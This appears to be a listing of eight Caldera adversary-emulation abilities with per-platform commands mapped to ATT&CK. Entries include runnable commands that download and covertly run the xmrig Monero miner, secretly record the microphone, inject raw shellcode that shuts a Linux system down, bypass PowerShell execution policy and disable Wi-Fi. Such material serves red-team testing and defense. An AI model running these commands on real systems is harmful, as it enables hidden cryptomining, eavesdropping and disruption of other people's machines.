Caldera emulation abilities
8 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
Abilities
Crypto (Monero) Mining
Download and execute Monero miner (xmrig) for 1 minute
[{"platform": "linux", "executor": "sh", "command": "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? -eq 124 ]\n"}, {"platform": "darwin", "executor": "sh", "command": "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n"}, {"platform": "windows", "executor": "psh", "command": "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n"}]

Disrupt WIFI
Turn a computer's WIFI off
[{"platform": "darwin", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "linux", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "windows", "executor": "psh", "command": ".\\wifi.ps1 -Off\n"}]

File Hunter Mission
Hunts for files of a certain extension and inserts a message
[{"platform": "darwin", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "linux", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "windows", "executor": "cmd", "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\"}, {"platform": "windows", "executor": "psh", "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';"}]

Invoke-MemeKatz
Downloads random meme and sets as desktop background
[{"platform": "windows", "executor": "psh,pwsh", "command": ".\\Invoke-MemeKatz.ps1\n"}, {"platform": "windows", "executor": "cmd", "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n"}]

Leave note
Create a text file for the user to find
[{"platform": "darwin", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "linux", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "windows", "executor": "psh", "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n"}]

Quit Outlook
Quit Outlook
[{"platform": "darwin", "executor": "osa", "command": "quit app \"Microsoft Outlook.app\""}]

Record microphone
Install sox and record microphone for n-seconds
[{"platform": "darwin", "executor": "sh", "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n"}]

Shutdown Target System
Force shutdown a target system using Process Injection and raw shellcode
[{"platform": "linux", "executor": "shellcode_amd64,shellcode_386", "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n"}]